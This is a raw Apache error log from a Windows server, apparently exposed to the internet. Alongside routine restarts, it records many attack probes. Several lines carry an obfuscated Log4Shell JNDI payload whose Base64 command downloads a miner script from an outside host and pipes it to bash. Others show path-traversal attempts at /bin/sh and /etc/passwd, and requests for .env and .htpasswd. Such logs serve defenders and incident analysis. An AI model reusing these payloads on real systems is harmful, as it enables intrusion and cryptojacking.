[Tue Aug 12 15:05:32.523914 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00455: Apache/2.4.51 (Win64) configured -- resuming normal operations
[Tue Aug 12 15:05:32.523914 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00456: Apache Lounge VS16 Server built: Oct 7 2021 16:27:02
[Tue Aug 12 15:05:32.523914 2025] [core:notice] [pid 6612:tid 652] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Tue Aug 12 15:05:32.539518 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00418: Parent: Created child process 6836
[Tue Aug 12 15:05:32.914516 2025] [mpm_winnt:notice] [pid 6836:tid 632] AH00354: Child: Starting 64 worker threads.
[Tue Aug 12 15:06:14.271812 2025] [core:error] [pid 6836:tid 1084] (OS 5)拒绝访问。 : [client 172.27.200.3:49813] AH00127: Cannot map GET / HTTP/1.1 to file
[Tue Aug 12 15:06:32.966082 2025] [autoindex:error] [pid 6836:tid 1072] [client 172.27.200.3:49814] AH01276: Cannot serve directory C:/5gc/: No matching DirectoryIndex (index.html) found, and server-generated directory index forbidden by Options directive
[Tue Aug 12 15:06:42.247897 2025] [autoindex:error] [pid 6836:tid 1084] [client 172.27.200.3:49827] AH01276: Cannot serve directory C:/5gc/: No matching DirectoryIndex (index.html) found, and server-generated directory index forbidden by Options directive
[Tue Aug 12 15:08:38.075426 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00424: Parent: Received restart signal -- Restarting the server.
[Tue Aug 12 15:08:38.091045 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00455: Apache/2.4.51 (Win64) configured -- resuming normal operations
[Tue Aug 12 15:08:38.091045 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00456: Apache Lounge VS16 Server built: Oct 7 2021 16:27:02
[Tue Aug 12 15:08:38.091045 2025] [core:notice] [pid 6612:tid 652] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Tue Aug 12 15:08:38.091045 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00418: Parent: Created child process 7080
[Tue Aug 12 15:08:39.091135 2025] [mpm_winnt:notice] [pid 7080:tid 164] AH00354: Child: Starting 64 worker threads.
[Tue Aug 12 15:08:40.098289 2025] [mpm_winnt:notice] [pid 6836:tid 632] AH00364: Child: All worker threads have exited.
[Tue Aug 12 15:09:58.319153 2025] [autoindex:error] [pid 7080:tid 1120] [client 193.34.212.110:39316] AH01276: Cannot serve directory C:/5gc/: No matching DirectoryIndex (index.html) found, and server-generated directory index forbidden by Options directive
[Tue Aug 12 15:10:09.580061 2025] [autoindex:error] [pid 7080:tid 1116] [client 204.76.203.219:57870] AH01276: Cannot serve directory C:/5gc/: No matching DirectoryIndex (index.html) found, and server-generated directory index forbidden by Options directive
[Tue Aug 12 15:10:19.970254 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00424: Parent: Received restart signal -- Restarting the server.
[Tue Aug 12 15:10:20.001448 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00455: Apache/2.4.51 (Win64) configured -- resuming normal operations
[Tue Aug 12 15:10:20.001448 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00456: Apache Lounge VS16 Server built: Oct 7 2021 16:27:02
[Tue Aug 12 15:10:20.001448 2025] [core:notice] [pid 6612:tid 652] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Tue Aug 12 15:10:20.001448 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00418: Parent: Created child process 1540
[Tue Aug 12 15:10:20.985926 2025] [mpm_winnt:notice] [pid 1540:tid 572] AH00354: Child: Starting 64 worker threads.
[Tue Aug 12 15:10:22.001490 2025] [mpm_winnt:notice] [pid 7080:tid 164] AH00364: Child: All worker threads have exited.
[Tue Aug 12 15:10:33.912925 2025] [autoindex:error] [pid 1540:tid 1120] [client 172.27.200.3:49913] AH01276: Cannot serve directory C:/5gc/: No matching DirectoryIndex (index.html) found, and server-generated directory index forbidden by Options directive
[Tue Aug 12 15:10:39.260103 2025] [autoindex:error] [pid 1540:tid 1116] [client 172.27.200.3:49914] AH01276: Cannot serve directory C:/5gc/: No matching DirectoryIndex (index.html) found, and server-generated directory index forbidden by Options directive
[Tue Aug 12 15:11:06.732662 2025] [autoindex:error] [pid 1540:tid 1120] [client 172.27.200.3:49923] AH01276: Cannot serve directory C:/5gc/: No matching DirectoryIndex (index.html) found, and server-generated directory index forbidden by Options directive
[Tue Aug 12 15:12:35.975939 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00424: Parent: Received restart signal -- Restarting the server.
[Tue Aug 12 15:12:36.007095 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00455: Apache/2.4.51 (Win64) configured -- resuming normal operations
[Tue Aug 12 15:12:36.007095 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00456: Apache Lounge VS16 Server built: Oct 7 2021 16:27:02
[Tue Aug 12 15:12:36.007095 2025] [core:notice] [pid 6612:tid 652] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Tue Aug 12 15:12:36.007095 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00418: Parent: Created child process 3704
[Tue Aug 12 15:12:36.991474 2025] [mpm_winnt:notice] [pid 3704:tid 580] AH00354: Child: Starting 64 worker threads.
[Tue Aug 12 15:12:38.007155 2025] [mpm_winnt:notice] [pid 1540:tid 572] AH00364: Child: All worker threads have exited.
[Tue Aug 12 15:12:40.843055 2025] [autoindex:error] [pid 3704:tid 1120] [client 172.27.200.3:49941] AH01276: Cannot serve directory C:/5gc/: No matching DirectoryIndex (index.html) found, and server-generated directory index forbidden by Options directive
[Tue Aug 12 15:12:45.384072 2025] [autoindex:error] [pid 3704:tid 1120] [client 172.27.200.3:49941] AH01276: Cannot serve directory C:/5gc/: No matching DirectoryIndex (index.html) found, and server-generated directory index forbidden by Options directive
[Tue Aug 12 15:12:51.307233 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00424: Parent: Received restart signal -- Restarting the server.
[Tue Aug 12 15:12:51.322840 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00455: Apache/2.4.51 (Win64) configured -- resuming normal operations
[Tue Aug 12 15:12:51.322840 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00456: Apache Lounge VS16 Server built: Oct 7 2021 16:27:02
[Tue Aug 12 15:12:51.322840 2025] [core:notice] [pid 6612:tid 652] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Tue Aug 12 15:12:51.322840 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00418: Parent: Created child process 1548
[Tue Aug 12 15:12:52.311965 2025] [mpm_winnt:notice] [pid 1548:tid 132] AH00354: Child: Starting 64 worker threads.
[Tue Aug 12 15:13:13.678356 2025] [autoindex:error] [pid 3704:tid 1116] [client 172.27.200.3:49942] AH01276: Cannot serve directory C:/5gc/: No matching DirectoryIndex (index.html) found, and server-generated directory index forbidden by Options directive
[Tue Aug 12 15:13:13.689894 2025] [mpm_winnt:notice] [pid 3704:tid 580] AH00364: Child: All worker threads have exited.
[Tue Aug 12 15:13:18.457931 2025] [autoindex:error] [pid 1548:tid 1112] [client 172.27.200.3:49951] AH01276: Cannot serve directory C:/5gc/: No matching DirectoryIndex (index.html) found, and server-generated directory index forbidden by Options directive
[Tue Aug 12 15:13:41.288922 2025] [autoindex:error] [pid 1548:tid 1108] [client 172.27.200.3:49952] AH01276: Cannot serve directory C:/5gc/: No matching DirectoryIndex (index.html) found, and server-generated directory index forbidden by Options directive
[Tue Aug 12 15:15:04.824878 2025] [mpm_winnt:notice] [pid 6612:tid 652] AH00424: Parent: Received restart signal -- Restarting the server. AH00526: Syntax error on line 251 of C:/Apache24/conf/httpd.conf: DocumentRoot must be a directory
[Tue Aug 12 15:15:06.856182 2025] [mpm_winnt:notice] [pid 1548:tid 132] AH00364: Child: All worker threads have exited.
[Tue Aug 12 15:17:34.736726 2025] [core:warn] [pid 4672:tid 608] AH00098: pid file C:/Apache24/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Tue Aug 12 15:17:34.736726 2025] [mpm_winnt:notice] [pid 4672:tid 608] AH00455: Apache/2.4.51 (Win64) configured -- resuming normal operations
[Tue Aug 12 15:17:34.736726 2025] [mpm_winnt:notice] [pid 4672:tid 608] AH00456: Apache Lounge VS16 Server built: Oct 7 2021 16:27:02
[Tue Aug 12 15:17:34.736726 2025] [core:notice] [pid 4672:tid 608] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Tue Aug 12 15:17:34.736726 2025] [mpm_winnt:notice] [pid 4672:tid 608] AH00418: Parent: Created child process 5416
[Tue Aug 12 15:17:35.111753 2025] [mpm_winnt:notice] [pid 5416:tid 600] AH00354: Child: Starting 64 worker threads.
[Wed Aug 13 02:42:23.649350 2025] [cgi:error] [pid 5416:tid 1080] [client 149.50.96.5:19860] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 13 04:14:48.126860 2025] [cgi:error] [pid 5416:tid 1080] [client 206.168.34.93:37718] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Wed Aug 13 14:16:14.467843 2025] [cgi:error] [pid 5416:tid 1080] [client 35.187.106.243:34690] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Thu Aug 14 00:27:46.416443 2025] [cgi:error] [pid 5416:tid 1088] [client 149.50.96.5:50856] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 14 03:01:12.169505 2025] [cgi:error] [pid 5416:tid 1088] [client 167.94.138.176:54168] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Thu Aug 14 03:03:40.500520 2025] [cgi:error] [pid 5416:tid 1068] [client 149.50.96.5:26022] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 14 10:08:51.484052 2025] [cgi:error] [pid 5416:tid 1088] [client 149.50.96.5:53712] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/index.html
[Thu Aug 14 12:59:11.988984 2025] [cgi:error] [pid 5416:tid 1088] [client 206.168.34.95:59156] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Thu Aug 14 23:44:54.553234 2025] [core:error] [pid 5416:tid 1080] [client 180.76.228.201:53892] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Fri Aug 15 01:20:30.452752 2025] [mpm_winnt:error] [pid 5416:tid 1728] AH00326: Server ran out of threads to serve requests. Consider raising the ThreadsPerChild setting
[Fri Aug 15 01:20:30.515193 2025] [cgi:error] [pid 5416:tid 156] [client 64.235.43.102:35314] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/.env
[Fri Aug 15 01:20:32.718365 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:32.812114 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:32.859008 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:33.155873 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:33.281097 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:33.718423 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:34.421524 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:34.937238 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:34.937238 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:35.030914 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:35.046536 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:35.046536 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:35.046536 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:35.312194 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:35.359051 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:35.859072 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:35.859072 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:35.874696 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 01:20:35.999731 2025] [mpm_winnt:warn] [pid 5416:tid 1728] (OS 64)指定的网络名不再可用。 : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Aug 15 06:19:28.132128 2025] [core:error] [pid 5416:tid 156] (20024)The given path is misformatted or contained invalid characters: [client 80.75.212.83:57916] AH00127: Cannot map GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D%27%29 HTTP/1.1 to file, referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')
[Fri Aug 15 06:52:35.539502 2025] [cgi:error] [pid 5416:tid 156] [client 167.94.146.51:49184] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Fri Aug 15 09:11:53.313408 2025] [cgi:error] [pid 5416:tid 868] [client 61.219.11.155:49120] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Fri Aug 15 13:10:48.494168 2025] [cgi:error] [pid 5416:tid 900] [client 149.50.96.5:35404] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Fri Aug 15 15:34:07.158403 2025] [core:error] [pid 5416:tid 640] [client 51.195.2.242:57617] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Fri Aug 15 15:34:08.908515 2025] [core:error] [pid 5416:tid 640] [client 51.195.2.242:30250] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Sat Aug 16 07:47:59.698171 2025] [cgi:error] [pid 5416:tid 640] [client 162.142.125.214:50960] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Sat Aug 16 07:51:05.484985 2025] [cgi:error] [pid 5416:tid 640] [client 167.94.138.40:33908] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Sat Aug 16 10:28:55.853863 2025] [cgi:error] [pid 5416:tid 640] [client 149.50.96.5:17942] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/index.html
[Sat Aug 16 10:59:18.366212 2025] [core:error] [pid 5416:tid 640] [client 111.119.233.20:60481] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Sat Aug 16 10:59:18.616144 2025] [core:error] [pid 5416:tid 640] [client 111.119.233.20:10023] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Sat Aug 16 16:12:15.673828 2025] [core:error] [pid 5416:tid 640] [client 47.238.151.234:56868] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Sat Aug 16 16:12:15.876954 2025] [core:error] [pid 5416:tid 640] [client 47.238.151.234:56882] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Sat Aug 16 18:19:26.004002 2025] [cgi:error] [pid 5416:tid 640] [client 149.50.96.5:13000] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat Aug 16 21:32:31.498222 2025] [cgi:error] [pid 5416:tid 668] [client 185.244.104.2:33146] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun Aug 17 06:24:14.582974 2025] [cgi:error] [pid 5416:tid 668] [client 149.50.96.5:57758] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun Aug 17 09:00:42.108448 2025] [cgi:error] [pid 5416:tid 668] [client 167.94.138.164:49756] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Sun Aug 17 09:23:55.106698 2025] [core:error] [pid 5416:tid 668] [client 89.43.78.182:58746] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Sun Aug 17 09:23:58.721634 2025] [core:error] [pid 5416:tid 668] [client 89.43.78.182:58758] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Sun Aug 17 17:34:22.824298 2025] [cgi:error] [pid 5416:tid 668] [client 149.50.96.5:38824] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun Aug 17 18:12:24.754245 2025] [core:error] [pid 5416:tid 668] [client 111.119.234.186:55164] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Sun Aug 17 18:12:24.959602 2025] [core:error] [pid 5416:tid 668] [client 111.119.234.186:58714] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Mon Aug 18 06:33:30.219289 2025] [cgi:error] [pid 5416:tid 668] [client 149.50.96.5:18682] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Aug 18 09:20:43.145606 2025] [cgi:error] [pid 5416:tid 668] [client 149.50.96.5:60698] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/index.html
[Mon Aug 18 16:46:43.168040 2025] [core:error] [pid 5416:tid 1008] [client 119.8.169.21:58998] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Mon Aug 18 16:46:43.386849 2025] [core:error] [pid 5416:tid 1008] [client 119.8.169.21:59000] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Mon Aug 18 18:35:25.009740 2025] [cgi:error] [pid 5416:tid 1008] [client 149.50.96.5:21720] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 19 10:21:44.497291 2025] [core:error] [pid 5416:tid 668] (20024)The given path is misformatted or contained invalid characters: [client 80.75.212.83:58868] AH00127: Cannot map GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D%27%29 HTTP/1.1 to file, referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')
[Tue Aug 19 19:51:28.714952 2025] [cgi:error] [pid 5416:tid 1080] [client 199.45.155.84:54956] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Tue Aug 19 20:03:44.929558 2025] [core:error] [pid 5416:tid 1080] [client 197.220.93.117:33000] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Tue Aug 19 20:03:50.038914 2025] [core:error] [pid 5416:tid 1080] [client 197.220.93.117:33010] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Tue Aug 19 20:30:31.219543 2025] [cgi:error] [pid 5416:tid 852] [client 185.226.197.65:42081] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/main.pl
[Tue Aug 19 20:31:29.689618 2025] [core:error] [pid 5416:tid 992] [client 185.226.197.65:34523] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png)
[Tue Aug 19 20:31:31.611471 2025] [core:error] [pid 5416:tid 992] [client 185.226.197.64:36651] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png)
[Tue Aug 19 20:31:32.205298 2025] [core:error] [pid 5416:tid 992] [client 185.226.197.65:49767] AH10244: invalid URI path (/icons/.%2e/%2e%2e/apache2/icons/sphere1.png)
[Tue Aug 19 20:31:32.783450 2025] [cgi:error] [pid 5416:tid 1080] [client 185.226.197.62:54283] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Wed Aug 20 10:25:25.475790 2025] [cgi:error] [pid 5416:tid 992] [client 167.94.146.53:44456] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Wed Aug 20 14:43:13.606687 2025] [cgi:error] [pid 5416:tid 972] [client 118.26.104.78:57216] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Wed Aug 20 21:54:57.946281 2025] [core:error] [pid 5416:tid 992] [client 115.248.8.65:59216] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Wed Aug 20 21:55:00.961964 2025] [core:error] [pid 5416:tid 992] [client 115.248.8.65:59226] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Wed Aug 20 23:15:39.945323 2025] [core:error] [pid 5416:tid 916] [client 185.177.72.46:48700] AH10244: invalid URI path (/%2e%2e/%2e%2e/etc/passwd)
[Wed Aug 20 23:19:03.012210 2025] [authz_core:error] [pid 5416:tid 992] [client 185.177.72.46:64330] AH01630: client denied by server configuration: C:/Apache24/.htaccess
[Wed Aug 20 23:19:05.324706 2025] [authz_core:error] [pid 5416:tid 992] [client 185.177.72.46:64330] AH01630: client denied by server configuration: C:/Apache24/.htpasswd
[Wed Aug 20 23:19:46.419335 2025] [core:error] [pid 5416:tid 992] [client 185.177.72.46:63066] AH10244: invalid URI path (//1.1.1.1/../../../etc/passwd)
[Thu Aug 21 00:43:39.582395 2025] [cgi:error] [pid 5416:tid 992] [client 138.197.182.246:13556] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Thu Aug 21 04:03:37.112272 2025] [core:error] [pid 5416:tid 668] (20024)The given path is misformatted or contained invalid characters: [client 80.75.212.83:48850] AH00127: Cannot map GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D%27%29 HTTP/1.1 to file, referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')
[Thu Aug 21 10:30:53.407323 2025] [cgi:error] [pid 5416:tid 668] [client 167.94.138.179:60710] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Thu Aug 21 12:06:11.944868 2025] [cgi:error] [pid 5416:tid 1008] [client 167.94.145.111:33074] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Thu Aug 21 17:23:56.629628 2025] [cgi:error] [pid 5416:tid 668] [client 206.168.34.71:40116] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Thu Aug 21 22:33:26.304090 2025] [core:error] [pid 5416:tid 668] [client 103.31.119.10:49570] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Thu Aug 21 22:33:27.257208 2025] [core:error] [pid 5416:tid 668] [client 103.31.119.10:49572] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
